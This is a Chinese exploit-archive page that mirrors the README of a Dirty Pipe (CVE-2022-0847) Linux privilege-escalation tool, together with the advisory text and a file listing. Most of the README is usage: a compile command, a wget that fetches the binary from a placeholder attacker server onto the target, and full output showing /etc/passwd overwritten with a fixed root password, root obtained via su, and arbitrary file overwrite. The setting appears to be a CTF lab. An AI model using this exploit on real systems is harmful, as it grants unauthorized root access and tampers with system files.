POC详情: e0f7d0e39fcafed10940c22801147644e959673b

来源
https://github.com/n3rada/DirtyPipe
关联漏洞
标题: Linux kernel 安全漏洞 (CVE-2022-0847)
描述:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 存在安全漏洞,该漏洞源于新管道缓冲区结构的“flag”变量在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化。非特权本地用户利用该漏洞可以提升权限至root。以下产品和版本受到影响:Linux Kernel 5.8-5.16.11、5.8-5.15.25、5.8-5.10.102。
描述
Working Dirty Pipe (CVE-2022-0847) exploit tool with root access and file overwrites.
介绍
# Dirty Pipe Exploit: CVE-2022-0847
The Dirty Pipe vulnerability, also known as CVE-2022-0847, is a significant flaw within the Linux kernel. This repository provides an adapted version of the widely used exploit code to make it more user-friendly and modular.

A very good explanation of this vulnerability can be found on the [HackTheBox blog](https://www.hackthebox.com/blog/Dirty-Pipe-Explained-CVE-2022-0847). Max Kellermann's original, more detailed explanation can be found [on his blog](https://dirtypipe.cm4all.com/).

This adapted version is segmented into different methods to increase modularity and ease of modification. Notably, there's an added --root option that modifies the /etc/passwd file, to leverage root access with password `el3ph@nt!`.

Compile the exploit statically:
```shell
gcc -o dpipe dpipe.c -static
```

And retrieve-it from your target before launching-it:
```shell
yoan@teecup:~$ wget http://YOUR_SERVER_ADDRESS/unix/cve/dpipe
--2023-10-15 20:07:44--  http://YOUR_SERVER_ADDRESS/unix/cve/dpipe
Connecting to YOUR_SERVER_ADDRESS:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 769792 (752K) [text/plain]
Saving to: ‘dpipe’

dpipe                                   100%[=============================================================================>] 751.75K  --.-KB/s    in 0.09s

2023-10-15 20:07:44 (8.09 MB/s) - ‘dpipe’ saved [769792/769792]

yoan@teecup:~$ chmod +x dpipe
yoan@teecup:~$ ./dpipe --root
[Dirty Pipe] Attempting to backup '/etc/passwd' to '/tmp/passwd.bak'
[Dirty Pipe] Successfully backed up '/etc/passwd' to '/tmp/passwd.bak'
[Dirty Pipe] Initiating write to '/etc/passwd'...
[Dirty Pipe] Data size to write: 131 bytes
[Dirty Pipe] File '/etc/passwd' opened successfully for reading.
[Dirty Pipe] Pipe size determined: 65536 bytes
[Dirty Pipe] Filling the pipe...
[Dirty Pipe] Pipe filled successfully.
[Dirty Pipe] Draining the pipe...
[Dirty Pipe] Pipe drained successfully.
[Dirty Pipe] Data successfully written to '/etc/passwd'.
[Dirty Pipe] You can connect as root with password 'el3ph@nt!'
[Dirty Pipe] Program execution completed successfully.
yoan@teecup:~$
yoan@teecup:~$ cat /etc/passwd
root:$6$9WETWbCBTQ8pxg4I$odZAx8iIlayCnFdUwDM5dHVfsXXZo1RHRp2a4uQzcPDkRiTJYLA4loZESihn4ASGhWKN9.RWPT.CZJdyfTej4/:0:0:root:/root:/bin/sh
:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
yoan:x:1000:1000::/home/yoan:/bin/bash
yoan@teecup:~$ su root
Password:
# cd /root
# cat flag.txt
Great job! You found me.
```

You can also use the exploit to overwrite content in other files:
```shell
yoan@teecup:~$ echo "Vxxx" > dirty
yoan@teecup:~$ cat dirty
Vxxx
yoan@teecup:~$ ./dpipe dirty 1 uln
[Dirty Pipe] Standard file overwrite mode detected...
[Dirty Pipe] Attempting to backup 'dirty' to '/tmp/dirty.bak'
[Dirty Pipe] Successfully backed up 'dirty' to '/tmp/dirty.bak'
[Dirty Pipe] Initiating write to 'dirty'...
[Dirty Pipe] Data size to write: 3 bytes
[Dirty Pipe] File 'dirty' opened successfully for reading.
[Dirty Pipe] Pipe size determined: 65536 bytes
[Dirty Pipe] Filling the pipe...
[Dirty Pipe] Pipe filled successfully.
[Dirty Pipe] Draining the pipe...
[Dirty Pipe] Pipe drained successfully.
[Dirty Pipe] Data successfully written to 'dirty'.
[Dirty Pipe] Program execution completed successfully.
yoan@teecup:~$ cat dirty
Vuln
```
文件快照

 [4.0K]  /data/pocs/e0f7d0e39fcafed10940c22801147644e959673b
├── [865K]  dpipe
├── [7.5K]  dpipe.c
├── [1.0K]  LICENSE
└── [4.2K]  README.md

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。